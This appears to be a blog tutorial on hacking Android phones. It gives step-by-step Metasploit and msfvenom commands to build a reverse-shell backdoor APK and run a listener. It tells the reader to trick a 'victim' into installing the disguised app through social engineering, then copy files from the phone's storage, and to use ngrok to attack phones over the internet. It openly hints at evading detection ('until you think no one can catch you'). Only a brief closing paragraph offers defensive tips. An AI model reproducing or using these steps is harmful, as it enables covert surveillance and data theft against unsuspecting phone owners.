Hacking into someone’s phone is not a legal practice until you have permission, wait if we have permission to access the device then why would I need to hack it? Isn’t these statements make us confusing?
Hacking is never ethical or legal whereas we categorize hacking into two types that is ethical hacking and unethical hacking.
I would like to draw your attention to these statements and the comparisons so that before starting hacking you know what are you trying to do and how will it affect you if something goes wrong.
I have already mentioned above that why don’t I satisfy with the statement ‘Ethical Hacking’. So, “No hacking is legal, and if it is legal then it’s not hacking” – [VIASK]
What do we have for you
- Os Used for Hacking
- Tools For Hacking Android Device
- Metasploit Framework
- What does this hack can do?
So, Let me make it clear that if you are a beginner then test it on your device only until you think no one can catch you.
Os Used for Hacking
We are going to use Kali Linux as our primary operating system for hacking. Check out our blog post on Best Hacking OS Distribution for Hacking.
Tools For Hacking Android Device
Hacking an Android device is almost an easy task. You will require
- Kali Linux Operating System
- Good Internet Connection
- Testing Android Device
Yes these are the only things that we require for this tutorial on hacking android device
We are going to use pre-installed packages to perform a hacking attack on android. In this tutorial, I will be stating 2 types of hacking that can be done on android devices.
1. Hacking android device over LAN (Local Area Network)
2. Hacking Android device over WAN (Wide Area Network)
Now, let us discuss what are the packages we are going to use in this hack and what do they do. For both of these hacks, we are going to use almost the same tools and same technique.
This is an open-source penetration testing and development platform that provides a wide range of exploits for a variety of applications, OS, and other platforms. Metasploit is the most commonly used penetration testing tool and it comes pre-installed in Kali Linux.
The main components in the framework are called modules.
Modules are the pieces of code or software that provide the functionality to the Metasploit. There is a total of six modules in this framework I.e exploits, payloads, auxiliary, nops, posts, and encoders.
For this tutorial, we will only focus on Exploits and Payloads.
Exploit: An exploit is a piece of commands that takes advantage of a system’s vulnerability and installs a payload in the system.
Payload: Payload is the transmission data, The payload gives the attacker access to the system by a variety of methods. In this, we are going to use reverse shell and meterpreter.
So, let us Move on to our Kali Linux Terminal Window
Step1: Type msfupdate (This will update your package Metasploit Framework)
Step2: cd/Desktop/ (This will shift you to the Desktop. Now All the work that is done can be saved into Desktop)
Step3: Type the following commands: msfvenom -p android/meterpreter/reverse_tcp Lhost= <Your ip> Lport= 4444 >R -o /root/Desktop/vulnerable.apk
To Find your IP Type ifconfig
Step4: Now type: msfconsole (this will open your Metasploit console from where you will start the hacking session on the victim’s device )
Step5: Now type: set payload android/meterpreter/reverse_tcp (This will now create your connection with the payload)
Step6: Now type: set lhost <Your Ip>
Step7: Now type: set lport 4444
Step8: Now type: exploit (When you hit enter after writing an exploit, you will now see a window where the Metasploit is trying to establish the connection between your hacking machine and the victim’s device)
Step9: Now you see that after Step 3 a payload has been created on the desktop with the name vulnerable.apk.
Now transfer this payload to the victims phone and allow him to install this using your Social Engineering Skills. Once he / She installs the application in the device your meterpreter session would start and you will be able to access the victims android device.
Now as you have established the connection between the victim’s device and your hacking machine, Now let us do some hacking stuff. Till now we have entered into the victim’s device only.
Step10: Now type: cd/sdcard (This will enter you into the victim’s sd card )
Step11: Now type: ls (This will list all the items present in the sd card)
Step12: Now type: cd/<any folder name> (You will enter into the particular folder)
Step13: Now to download any file of the victim’s device type: download <filename.extension> (This will download that particular file in your device )
Do follow the rest of the commands that we have stated earlier on the Best hacking OS, These are the only basics of the Kali Linux hacking.
What does this hack can do?
This hack creates a backdoor in the victim’s device and then establish a connection between victims device and your hacking machine. After doing this you run the commands in your kali machine and you get data from victim’s phones isn’t this awesome.
Now note: this type of hacking is also known as local area hacking or LAN hacking. As you can only hack the devices that are connected to a particular network.
Hacking someone’s phone over WAN
2nd Type of hacking with the payload hacking but this time hacking it over WAN or wide area network and which simply means you are hacking over the internet. You are sitting in India and hacking someone sitting in Japan.
This type of hacking is also easy but it requires some patience and a few presentable skills Like we use to eat but we judge the food by its topping. Simply like this, we have to present our vulnerable apk that the victim cannot find that something is fishy in this apk.
Now all the steps are similar that have been mentioned in our 1st hack that is over LAN. But in this firstly we will do port forwarding (Port forwarding is the process after which we can hack over the internet. For this, you will need a router)
Don’t you have a router? Are you using the internet from your android device via USB tethering? Or using someone’s hotspot? No worries I have a solution for that also.
This solution can work on both if you have a router or not. For this install ngrok on the Kali Linux machine. All the instructions like how to install are provided in its official website)
After you have successfully installed ngrok. Execute or run it. Now copy your IP address and set it in ngrok. Now you will get a dynamic IP address and port. Use these resources as LHOST and LPORT in the session.
That’s all this is the only thing you need to do for hacking over the internet. Now after this follow the steps that were taught to you while hacking over LAN.
This is not only for a hacking purpose but it also gives you a piece of information that how to be secure. Never install any application that is not of your use. Check whether the application you have installed is genuine or not? Is it asking for multiple permissions while installing?
If yes then check whether that application requires that type of permission or someone is playing with your privacy. If you find anything suspicious immediately uninstall the application.
ngrok is free software that provides us dynamic IP.
The IP (internet protocol) given to us by our Service provider is a static IP address. And if we lose our internet connection then we can see that our IP changes. And if this problem arises during the hacking course then, our all efforts are wiped out. So, that’s why we do not use static IP as it will change whenever the connection is lost.
Dynamic IP is vice-versa of static IP. Firstly, it is not provided by our ISP (Internet Service Provider) to everyone. If you want a dynamic IP from ISP then you will have to buy it from ISP.
Yes, it is possible. You can capture the victim’s cookie and manipulate them to find something useful.